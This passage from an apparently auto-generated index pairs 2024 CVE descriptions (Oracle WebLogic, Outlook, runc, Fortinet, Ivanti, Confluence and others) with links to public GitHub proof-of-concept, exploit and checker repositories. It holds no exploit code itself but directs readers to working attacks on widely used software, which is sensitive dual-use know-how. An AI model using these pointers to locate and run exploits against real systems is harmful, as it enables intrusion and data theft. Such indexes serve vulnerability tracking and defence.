Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
- [GlassyAmadeus/CVE-2024-20931](https://github.com/GlassyAmadeus/CVE-2024-20931)
- [Leocodefocus/CVE-2024-20931-Poc](https://github.com/Leocodefocus/CVE-2024-20931-Poc)
- [ATonysan/CVE-2024-20931_weblogic](https://github.com/ATonysan/CVE-2024-20931_weblogic)
- [dinosn/CVE-2024-20931](https://github.com/dinosn/CVE-2024-20931)
### CVE-2024-21006 (2024-04-16)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
- [momika233/CVE-2024-21006](https://github.com/momika233/CVE-2024-21006)
- [lightr3d/CVE-2024-21006_jar](https://github.com/lightr3d/CVE-2024-21006_jar)
- [dadvlingd/CVE-2024-21006](https://github.com/dadvlingd/CVE-2024-21006)
### CVE-2024-21107 (2024-04-16)
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: This vulnerability applies to Windows hosts only. CVSS 3.1 Base Score 6.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
- [Alaatk/CVE-2024-21107](https://github.com/Alaatk/CVE-2024-21107)
### CVE-2024-21111 (2024-04-16)
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.16. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: This vulnerability applies to Windows hosts only. CVSS 3.1 Base Score 7.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
- [mansk1es/CVE-2024-21111](https://github.com/mansk1es/CVE-2024-21111)
- [10cks/CVE-2024-21111-del](https://github.com/10cks/CVE-2024-21111-del)
- [x0rsys/CVE-2024-21111](https://github.com/x0rsys/CVE-2024-21111)
### CVE-2024-21305 (2024-01-09)
Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability
- [tandasat/CVE-2024-21305](https://github.com/tandasat/CVE-2024-21305)
### CVE-2024-21306 (2024-01-09)
Microsoft Bluetooth Driver Spoofing Vulnerability
- [d4rks1d33/C-PoC-for-CVE-2024-21306](https://github.com/d4rks1d33/C-PoC-for-CVE-2024-21306)
- [PhucHauDeveloper/BadBlue](https://github.com/PhucHauDeveloper/BadBlue)
### CVE-2024-21320 (2024-01-09)
Windows Themes Spoofing Vulnerability
- [sxyrxyy/CVE-2024-21320-POC](https://github.com/sxyrxyy/CVE-2024-21320-POC)
### CVE-2024-21338 (2024-02-13)
Windows Kernel Elevation of Privilege Vulnerability
- [hakaioffsec/CVE-2024-21338](https://github.com/hakaioffsec/CVE-2024-21338)
- [UMU618/CVE-2024-21338](https://github.com/UMU618/CVE-2024-21338)
- [varwara/CVE-2024-21338](https://github.com/varwara/CVE-2024-21338)
- [Zombie-Kaiser/CVE-2024-21338-x64-build-](https://github.com/Zombie-Kaiser/CVE-2024-21338-x64-build-)
- [tykawaii98/CVE-2024-21338_PoC](https://github.com/tykawaii98/CVE-2024-21338_PoC)
- [Crowdfense/CVE-2024-21338](https://github.com/Crowdfense/CVE-2024-21338)
### CVE-2024-21345 (2024-02-13)
Windows Kernel Elevation of Privilege Vulnerability
- [exploits-forsale/CVE-2024-21345](https://github.com/exploits-forsale/CVE-2024-21345)
- [FoxyProxys/CVE-2024-21345](https://github.com/FoxyProxys/CVE-2024-21345)
### CVE-2024-21378 (2024-02-13)
Microsoft Outlook Remote Code Execution Vulnerability
- [d0rb/CVE-2024-21378](https://github.com/d0rb/CVE-2024-21378)
### CVE-2024-21388 (2024-01-30)
Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability
- [d0rb/CVE-2024-21388](https://github.com/d0rb/CVE-2024-21388)
### CVE-2024-21412 (2024-02-13)
Internet Shortcut Files Security Feature Bypass Vulnerability
- [lsr00ter/CVE-2024-21412_Water-Hydra](https://github.com/lsr00ter/CVE-2024-21412_Water-Hydra)
### CVE-2024-21413 (2024-02-13)
Microsoft Outlook Remote Code Execution Vulnerability
- [duy-31/CVE-2024-21413](https://github.com/duy-31/CVE-2024-21413)
- [xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability](https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability)
- [r00tb1t/CVE-2024-21413-POC](https://github.com/r00tb1t/CVE-2024-21413-POC)
- [CMNatic/CVE-2024-21413](https://github.com/CMNatic/CVE-2024-21413)
- [MSeymenD/CVE-2024-21413](https://github.com/MSeymenD/CVE-2024-21413)
- [Mdusmandasthaheer/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability](https://github.com/Mdusmandasthaheer/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability)
- [ahmetkarakayaoffical/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability](https://github.com/ahmetkarakayaoffical/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability)
- [dshabani96/CVE-2024-21413](https://github.com/dshabani96/CVE-2024-21413)
- [X-Projetion/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit](https://github.com/X-Projetion/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit)
- [th3Hellion/CVE-2024-21413](https://github.com/th3Hellion/CVE-2024-21413)
- [ShubhamKanhere307/CVE-2024-21413](https://github.com/ShubhamKanhere307/CVE-2024-21413)
- [olebris/CVE-2024-21413](https://github.com/olebris/CVE-2024-21413)
- [DerZiad/CVE-2024-21413](https://github.com/DerZiad/CVE-2024-21413)
- [Redfox-Secuirty/Unveiling-Moniker-Link-CVE-2024-21413-Navigating-the-Latest-Cybersecurity-Landscape](https://github.com/Redfox-Secuirty/Unveiling-Moniker-Link-CVE-2024-21413-Navigating-the-Latest-Cybersecurity-Landscape)
- [ThemeHackers/CVE-2024-21413](https://github.com/ThemeHackers/CVE-2024-21413)
### CVE-2024-21514 (2024-06-22)
This affects versions of the package opencart/opencart from 0.0.0. An SQL Injection issue was identified in the Divido payment extension for OpenCart, which is included by default in version 3.0.3.9. As an anonymous unauthenticated user, if the Divido payment module is installed (it does not have to be enabled), it is possible to exploit SQL injection to gain unauthorised access to the backend database. For any site which is vulnerable, any unauthenticated user could exploit this to dump the entire OpenCart database, including customer PII data.
- [bigb0x/CVE-2024-21514](https://github.com/bigb0x/CVE-2024-21514)
### CVE-2024-21520 (2024-06-26)
Versions of the package djangorestframework before 3.15.2 are vulnerable to Cross-site Scripting (XSS) via the break_long_headers template filter due to improper input sanitization before splitting and joining with <br> tags.
- [ch4n3-yoon/CVE-2024-21520-Demo](https://github.com/ch4n3-yoon/CVE-2024-21520-Demo)
### CVE-2024-21626 (2024-01-31)
runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc 1.1.11 and earlier, due to an internal file descriptor leak, an attacker could cause a newly-spawned container process (from runc exec) to have a working directory in the host filesystem namespace, allowing for a container escape by giving access to the host filesystem ("attack 2"). The same attack could be used by a malicious image to allow a container process to gain access to the host filesystem through runc run ("attack 1"). Variants of attacks 1 and 2 could be also be used to overwrite semi-arbitrary host binaries, allowing for complete container escapes ("attack 3a" and "attack 3b"). runc 1.1.12 includes patches for this issue.
- [zpxlz/CVE-2024-21626-POC](https://github.com/zpxlz/CVE-2024-21626-POC)
- [NitroCao/CVE-2024-21626](https://github.com/NitroCao/CVE-2024-21626)
- [Wall1e/CVE-2024-21626-POC](https://github.com/Wall1e/CVE-2024-21626-POC)
- [cdxiaodong/CVE-2024-21626](https://github.com/cdxiaodong/CVE-2024-21626)
- [zhangguanzhang/CVE-2024-21626](https://github.com/zhangguanzhang/CVE-2024-21626)
- [laysakura/CVE-2024-21626-demo](https://github.com/laysakura/CVE-2024-21626-demo)
- [V0WKeep3r/CVE-2024-21626-runcPOC](https://github.com/V0WKeep3r/CVE-2024-21626-runcPOC)
- [abian2/CVE-2024-21626](https://github.com/abian2/CVE-2024-21626)
- [Sk3pper/CVE-2024-21626](https://github.com/Sk3pper/CVE-2024-21626)
- [KubernetesBachelor/CVE-2024-21626](https://github.com/KubernetesBachelor/CVE-2024-21626)
- [dorser/cve-2024-21626](https://github.com/dorser/cve-2024-21626)
- [FlojBoj/CVE-2024-21626](https://github.com/FlojBoj/CVE-2024-21626)
### CVE-2024-21633 (2024-01-03)
Apktool is a tool for reverse engineering Android APK files. In versions 2.9.1 and prior, Apktool infers resource files' output path according to their resource names which can be manipulated by attacker to place files at desired location on the system Apktool runs on. Affected environments are those in which an attacker may write/overwrite any file that user has write access, and either user name is known or cwd is under user folder. Commit d348c43b24a9de350ff6e5bd610545a10c1fc712 contains a patch for this issue.
- [0x33c0unt/CVE-2024-21633](https://github.com/0x33c0unt/CVE-2024-21633)
### CVE-2024-21644 (2024-01-08)
pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.
- [ltranquility/CVE-2024-21644-Poc](https://github.com/ltranquility/CVE-2024-21644-Poc)
### CVE-2024-21683 (2024-05-21)
This High severity RCE (Remote Code Execution) vulnerability was introduced in version 5.2 of Confluence Data Center and Server.\n\nThis RCE (Remote Code Execution) vulnerability, with a CVSS Score of 7.2, allows an authenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires no user interaction. \n\nAtlassian recommends that Confluence Data Center and Server customers upgrade to latest version. If you are unable to do so, upgrade your instance to one of the specified supported fixed versions. See the release notes https://confluence.atlassian.com/doc/confluence-release-notes-327.html\n\nYou can download the latest version of Confluence Data Center and Server from the download center https://www.atlassian.com/software/confluence/download-archives.\n\nThis vulnerability was found internally.
- [r00t7oo2jm/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server](https://github.com/r00t7oo2jm/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server)
- [W01fh4cker/CVE-2024-21683-RCE](https://github.com/W01fh4cker/CVE-2024-21683-RCE)
- [absholi7ly/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server](https://github.com/absholi7ly/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server)
- [phucrio/CVE-2024-21683-RCE](https://github.com/phucrio/CVE-2024-21683-RCE)
- [xh4vm/CVE-2024-21683](https://github.com/xh4vm/CVE-2024-21683)
### CVE-2024-21689 (2024-08-20)
This High severity RCE (Remote Code Execution) vulnerability CVE-2024-21689 was introduced in versions 9.1.0, 9.2.0, 9.3.0, 9.4.0, 9.5.0, and 9.6.0 of Bamboo Data Center and Server.\r\n\r\nThis RCE (Remote Code Execution) vulnerability, with a CVSS Score of 7.6, allows an authenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires user interaction.\r\n\r\nAtlassian recommends that Bamboo Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions:\r\n Bamboo Data Center and Server 9.2: Upgrade to a release greater than or equal to 9.2.17\r\n\r\n Bamboo Data Center and Server 9.6: Upgrade to a release greater than or equal to 9.6.5\r\n\r\nSee the release notes ([https://confluence.atlassian.com/bambooreleases/bamboo-release-notes-1189793869.html]). You can download the latest version of Bamboo Data Center and Server from the download center ([https://www.atlassian.com/software/bamboo/download-archives]).\r\n\r\nThis vulnerability was reported via our Bug Bounty program.
- [salvadornakamura/CVE-2024-21689](https://github.com/salvadornakamura/CVE-2024-21689)
### CVE-2024-21733 (2024-01-19)
Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43.\n\nUsers are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.\n\n
- [LtmThink/CVE-2024-21733](https://github.com/LtmThink/CVE-2024-21733)
### CVE-2024-21754 (2024-06-11)
A use of password hash with insufficient computational effort vulnerability [CWE-916] affecting FortiOS version 7.4.3 and below, 7.2 all versions, 7.0 all versions, 6.4 all versions and FortiProxy version 7.4.2 and below, 7.2 all versions, 7.0 all versions, 2.0 all versions may allow a privileged attacker with super-admin profile and CLI access to decrypting the backup file.
- [CyberSecuritist/CVE-2024-21754-Forti-RCE](https://github.com/CyberSecuritist/CVE-2024-21754-Forti-RCE)
### CVE-2024-21762 (2024-02-09)
A out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows attacker to execute unauthorized code or commands via specifically crafted requests
- [BishopFox/cve-2024-21762-check](https://github.com/BishopFox/cve-2024-21762-check)
- [cleverg0d/CVE-2024-21762-Checker](https://github.com/cleverg0d/CVE-2024-21762-Checker)
- [h4x0r-dz/CVE-2024-21762](https://github.com/h4x0r-dz/CVE-2024-21762)
- [r4p3c4/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check](https://github.com/r4p3c4/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check)
- [d0rb/CVE-2024-21762](https://github.com/d0rb/CVE-2024-21762)
- [lolminerxmrig/multicheck_CVE-2024-21762](https://github.com/lolminerxmrig/multicheck_CVE-2024-21762)
- [rdoix/cve-2024-21762-checker](https://github.com/rdoix/cve-2024-21762-checker)
### CVE-2024-21793 (2024-05-08)
\nAn OData injection vulnerability exists in the BIG-IP Next Central Manager API (URI). Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
- [FeatherStark/CVE-2024-21793](https://github.com/FeatherStark/CVE-2024-21793)
### CVE-2024-21887 (2024-01-12)
A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.
- [oways/ivanti-CVE-2024-21887](https://github.com/oways/ivanti-CVE-2024-21887)
- [duy-31/CVE-2023-46805_CVE-2024-21887](https://github.com/duy-31/CVE-2023-46805_CVE-2024-21887)
- [Chocapikk/CVE-2024-21887](https://github.com/Chocapikk/CVE-2024-21887)
- [raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887](https://github.com/raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887)
- [seajaysec/Ivanti-Connect-Around-Scan](https://github.com/seajaysec/Ivanti-Connect-Around-Scan)
- [mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped](https://github.com/mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped)
- [tucommenceapousser/CVE-2024-21887](https://github.com/tucommenceapousser/CVE-2024-21887)
### CVE-2024-21893 (2024-01-31)
A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.
- [h4x0r-dz/CVE-2024-21893.py](https://github.com/h4x0r-dz/CVE-2024-21893.py)
- [Chocapikk/CVE-2024-21893-to-CVE-2024-21887](https://github.com/Chocapikk/CVE-2024-21893-to-CVE-2024-21887)
### CVE-2024-21978 (2024-08-05)
Improper input validation in SEV-SNP could allow a malicious hypervisor to read or overwrite guest memory potentially leading to data leakage or data corruption.
- [Freax13/cve-2024-21978-poc](https://github.com/Freax13/cve-2024-21978-poc)
### CVE-2024-21980 (2024-08-05)
Improper restriction of write operations in SNP firmware could allow a malicious hypervisor to potentially overwrite a guest's memory or UMC seed resulting in loss of confidentiality and integrity.
- [Freax13/cve-2024-21980-poc](https://github.com/Freax13/cve-2024-21980-poc)
### CVE-2024-22002 (2024-06-18)
CORSAIR iCUE 5.9.105 with iCUE Murals on Windows allows unprivileged users to insert DLL files in the cuepkg-1.2.6 subdirectory of the installation directory.
- [0xkickit/iCUE_DllHijack_LPE-CVE-2024-22002](https://github.com/0xkickit/iCUE_DllHijack_LPE-CVE-2024-22002)
### CVE-2024-22024 (2024-02-13)
An XML external entity or XXE vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and ZTA gateways which allows an attacker to access certain restricted resources without authentication.
- [0dteam/CVE-2024-22024](https://github.com/0dteam/CVE-2024-22024)
### CVE-2024-22026 (2024-05-22)
A local privilege escalation vulnerability in EPMM before 12.1.0.0 allows an authenticated local user to bypass shell restriction and execute arbitrary commands on the appliance.
- [securekomodo/CVE-2024-22026](https://github.com/securekomodo/CVE-2024-22026)
### CVE-2024-22120 (2024-05-17)
Zabbix server can perform command execution for configured scripts. After command is executed, audit entry is added to "Audit Log". Due to "clientip" field is not sanitized, it is possible to injection SQL into "clientip" and exploit time based blind SQL injection.
- [W01fh4cker/CVE-2024-22120-RCE](https://github.com/W01fh4cker/CVE-2024-22120-RCE)
- [isPique/CVE-2024-22120-RCE-with-gopher](https://github.com/isPique/CVE-2024-22120-RCE-with-gopher)
- [g4nkd/CVE-2024-22120-RCE-with-gopher](https://github.com/g4nkd/CVE-2024-22120-RCE-with-gopher)
### CVE-2024-22145 (2024-05-17)
Improper Privilege Management vulnerability in InstaWP Team InstaWP Connect allows Privilege Escalation.This issue affects InstaWP Connect: from n/a through 0.1.0.8.
- [RandomRobbieBF/CVE-2024-22145](https://github.com/RandomRobbieBF/CVE-2024-22145)
### CVE-2024-22198 (2024-01-11)
Nginx-UI is a web interface to manage Nginx configurations. It is vulnerable to arbitrary command execution by abusing the configuration settings. The `Home > Preference` page exposes a list of system settings such as `Run Mode`, `Jwt Secret`, `Node Secret` and `Terminal Start Command`. While the UI doesn't allow users to modify the `Terminal Start Command` setting, it is possible to do so by sending a request to the API. This issue may lead to authenticated remote code execution, privilege escalation, and information disclosure. This vulnerability has been patched in version 2.0.0.beta.9.
- [xiw1ll/CVE-2024-22198_Checker](https://github.com/xiw1ll/CVE-2024-22198_Checker)
### CVE-2024-22243 (2024-02-23)
Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.html attack or to a SSRF attack if the URL is used after passing validation checks.\n
- [SeanPesce/CVE-2024-22243](https://github.com/SeanPesce/CVE-2024-22243)
- [shellfeel/CVE-2024-22243-CVE-2024-22234](https://github.com/shellfeel/CVE-2024-22243-CVE-2024-22234)
### CVE-2024-22263 (2024-06-19)
Spring Cloud Data Flow is a microservices-based Streaming and Batch data processing in Cloud Foundry and Kubernetes. The Skipper server has the ability to receive upload package requests. However, due to improper sanitization for upload path, a malicious user who has access to skipper server api can use a crafted upload request to write arbitrary file to any location on file system, may even compromises the server.
- [securelayer7/CVE-2024-22263_Scanner](https://github.com/securelayer7/CVE-2024-22263_Scanner)
### CVE-2024-22274 (2024-05-21)
The vCenter Server contains an authenticated remote code execution vulnerability. A malicious actor with administrative privileges on the vCenter appliance shell may exploit this issue to run arbitrary commands on the underlying operating system.
- [mbadanoiu/CVE-2024-22274](https://github.com/mbadanoiu/CVE-2024-22274)
- [ninhpn1337/CVE-2024-22274](https://github.com/ninhpn1337/CVE-2024-22274)
- [l0n3m4n/CVE-2024-22274-RCE](https://github.com/l0n3m4n/CVE-2024-22274-RCE)
- [Mustafa1986/CVE-2024-22274-RCE](https://github.com/Mustafa1986/CVE-2024-22274-RCE)
### CVE-2024-22275 (2024-05-21)
The vCenter Server contains a partial file read vulnerability. A malicious actor with administrative privileges on the vCenter appliance shell may exploit this issue to partially read arbitrary files containing sensitive data.
- [mbadanoiu/CVE-2024-22275](https://github.com/mbadanoiu/CVE-2024-22275)
### CVE-2024-22369 (2024-02-20)
Deserialization of Untrusted Data vulnerability in Apache Camel SQL ComponentThis issue affects Apache Camel: from 3.0.0 before 3.21.4, from 3.22.0 before 3.22.1, from 4.0.0 before 4.0.4, from 4.1.0 before 4.4.0.\n\nUsers are recommended to upgrade to version 4.4.0, which fixes the issue. If users are on the 4.0.x LTS releases stream, then they are suggested to upgrade to 4.0.4. If users are on 3.x, they are suggested to move to 3.21.4 or 3.22.1\n\n
- [oscerd/CVE-2024-22369](https://github.com/oscerd/CVE-2024-22369)
### CVE-2024-22393 (2024-02-22)
Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer.This issue affects Apache Answer: through 1.2.1.\n\nPixel Flood Attack by uploading large pixel files will cause server out of memory. A logged-in user can cause such an attack by uploading an image when posting content.\nUsers are recommended to upgrade to version [1.2.5], which fixes the issue.\n\n
- [omranisecurity/CVE-2024-22393](https://github.com/omranisecurity/CVE-2024-22393)
### CVE-2024-22411 (2024-01-16)
Avo is a framework to create admin panels for Ruby on Rails apps. In Avo 3 pre12, any HTML inside text that is passed to `error` or `succeed` in an `Avo::BaseAction` subclass will be rendered directly without sanitization in the toast/notification that appears in the UI on Action completion. A malicious user could exploit this vulnerability to trigger a cross site scripting attack on an unsuspecting user. This issue has been addressed in the 3.3.0 and 2.47.0 releases of Avo. Users are advised to upgrade.
- [tamaloa/avo-CVE-2024-22411](https://github.com/tamaloa/avo-CVE-2024-22411)
### CVE-2024-22416 (2024-01-17)
pyLoad is a free and open-source Download Manager written in pure Python. The `pyload` API allows any API call to be made using GET requests. Since the session cookie is not set to `SameSite: strict`, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. As a result any API call can be made via a CSRF attack by an unauthenticated user. This issue has been addressed in release `0.5.0b3.dev78`. All users are advised to upgrade.
- [mindstorm38/ensimag-secu3a-cve-2024-22416](https://github.com/mindstorm38/ensimag-secu3a-cve-2024-22416)
### CVE-2024-22514 (2024-02-06)
An issue discovered in iSpyConnect.com Agent DVR 5.1.6.0 allows attackers to run arbitrary files by restoring a crafted backup file.
- [Orange-418/CVE-2024-22514-Remote-Code-Execution](https://github.com/Orange-418/CVE-2024-22514-Remote-Code-Execution)
### CVE-2024-22515 (2024-02-06)
Unrestricted File Upload vulnerability in iSpyConnect.com Agent DVR 5.1.6.0 allows attackers to upload arbitrary files via the upload audio component.
- [Orange-418/AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution](https://github.com/Orange-418/AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution)
- [Orange-418/CVE-2024-22515-File-Upload-Vulnerability](https://github.com/Orange-418/CVE-2024-22515-File-Upload-Vulnerability)
### CVE-2024-22526 (2024-04-12)
Buffer Overflow vulnerability in bandisoft bandiview v7.0, allows local attackers to cause a denial of service (DoS) via exr image file.
- [200101WhoAmI/CVE-2024-22526](https://github.com/200101WhoAmI/CVE-2024-22526)
### CVE-2024-22532 (2024-02-28)
Buffer Overflow vulnerability in XNSoft NConvert 7.163 (for Windows x86) allows attackers to cause a denial of service via crafted xwd file.
- [pwndorei/CVE-2024-22532](https://github.com/pwndorei/CVE-2024-22532)
### CVE-2024-22534
- [austino2000/CVE-2024-22534](https://github.com/austino2000/CVE-2024-22534)
### CVE-2024-22640 (2024-04-19)
TCPDF version <=6.6.5 is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing an untrusted HTML page with a crafted color.
- [zunak/CVE-2024-22640](https://github.com/zunak/CVE-2024-22640)
### CVE-2024-22641 (-)
TCPDF version 6.6.5 and before is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing an untrusted SVG file.
- [zunak/CVE-2024-22641](https://github.com/zunak/CVE-2024-22641)
### CVE-2024-22752 (2024-03-07)
Insecure permissions issue in EaseUS MobiMover 6.0.5 Build 21620 allows attackers to gain escalated privileges via use of crafted executable launched from the application installation directory.
- [hacker625/CVE-2024-22752](https://github.com/hacker625/CVE-2024-22752)
### CVE-2024-22774 (-)
An issue in Panoramic Corporation Digital Imaging Software v.9.1.2.7600 allows a local attacker to escalate privileges via the ccsservice.exe component.
- [Gray-0men/CVE-2024-22774](https://github.com/Gray-0men/CVE-2024-22774)
### CVE-2024-22853 (2024-02-06)
D-LINK Go-RT-AC750 GORTAC750_A1_FW_v101b03 has a hardcoded password for the Alphanetworks account, which allows remote attackers to obtain root access via a telnet session.
- [FaLLenSKiLL1/CVE-2024-22853](https://github.com/FaLLenSKiLL1/CVE-2024-22853)
### CVE-2024-22867
- [brandon-t-elliott/CVE-2024-22867](https://github.com/brandon-t-elliott/CVE-2024-22867)
### CVE-2024-22889 (2024-03-05)
Due to incorrect access control in Plone version v6.0.9, remote attackers can view and list all files hosted on the website via sending a crafted request.
- [shenhav12/CVE-2024-22889-Plone-v6.0.9](https://github.com/shenhav12/CVE-2024-22889-Plone-v6.0.9)
### CVE-2024-22890
- [BurakSevben/CVE-2024-22890](https://github.com/BurakSevben/CVE-2024-22890)
### CVE-2024-22891 (2024-03-01)
Nteract v.0.28.0 was discovered to contain a remote code execution (RCE) vulnerability via the Markdown link.
- [EQSTLab/CVE-2024-22891](https://github.com/EQSTLab/CVE-2024-22891)
### CVE-2024-22894 (2024-01-30)
An issue fixed in AIT-Deutschland Alpha Innotec Heatpumps V2.88.3 or later, V3.89.0 or later, V4.81.3 or later and Novelan Heatpumps V2.88.3 or later, V3.89.0 or later, V4.81.3 or later, allows remote attackers to execute arbitrary code via the password component in the shadow file.
- [Jaarden/CVE-2024-22894](https://github.com/Jaarden/CVE-2024-22894)
### CVE-2024-22899 (2024-02-02)
Vinchin Backup & Recovery v7.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the syncNtpTime function.
- [Chocapikk/CVE-2024-22899-to-22903-ExploitChain](https://github.com/Chocapikk/CVE-2024-22899-to-22903-ExploitChain)
### CVE-2024-22909
- [BurakSevben/CVE-2024-22909](https://github.com/BurakSevben/CVE-2024-22909)
### CVE-2024-22922 (2024-01-25)
An issue in Projectworlds Vistor Management Systemin PHP v.1.0 allows a remtoe attacker to escalate privileges via a crafted script to the login page in the POST/index.php
- [keru6k/CVE-2024-22922](https://github.com/keru6k/CVE-2024-22922)
### CVE-2024-22939 (2024-02-01)
Cross Site Request Forgery vulnerability in FlyCms v.1.0 allows a remote attacker to execute arbitrary code via the system/article/category_edit component.
- [NUDTTAN91/CVE-2024-22939](https://github.com/NUDTTAN91/CVE-2024-22939)
### CVE-2024-22983 (2024-02-28)
SQL injection vulnerability in Projectworlds Visitor Management System in PHP v.1.0 allows a remote attacker to escalate privileges via the name parameter in the myform.php endpoint.
- [keru6k/CVE-2024-22983](https://github.com/keru6k/CVE-2024-22983)
### CVE-2024-23002
- [xiaomaoxxx/CVE-2024-23002](https://github.com/xiaomaoxxx/CVE-2024-23002)
### CVE-2024-23108 (2024-02-05)
An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.1.0 through 7.1.1 and 7.0.0 through 7.0.2 and 6.7.0 through 6.7.8 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.2 and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via via crafted API requests.
- [horizon3ai/CVE-2024-23108](https://github.com/horizon3ai/CVE-2024-23108)
- [hitem/CVE-2024-23108](https://github.com/hitem/CVE-2024-23108)
### CVE-2024-23112 (2024-03-12)
An authorization bypass through user-controlled key vulnerability [CWE-639] in FortiOS version 7.4.0 through 7.4.1, 7.2.0 through 7.2.6, 7.0.1 through 7.0.13, 6.4.7 through 6.4.14, and FortiProxy version 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14 SSL-VPN may allow an authenticated attacker to gain access to another user’s bookmark via URL manipulation.
- [zgimszhd61/CVE-2024-23112](https://github.com/zgimszhd61/CVE-2024-23112)
### CVE-2024-23113 (2024-02-15)
A use of externally-controlled format string in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, FortiPAM versions 1.2.0, 1.1.0 through 1.1.2, 1.0.0 through 1.0.3, FortiSwitchManager versions 7.2.0 through 7.2.3, 7.0.0 through 7.0.3 allows attacker to execute unauthorized code or commands via specially crafted packets.
- [OxLmahdi/cve-2024-23113](https://github.com/OxLmahdi/cve-2024-23113)
- [CheckCve2/CVE-2024-23113](https://github.com/CheckCve2/CVE-2024-23113)
- [HazeLook/CVE-2024-23113](https://github.com/HazeLook/CVE-2024-23113)
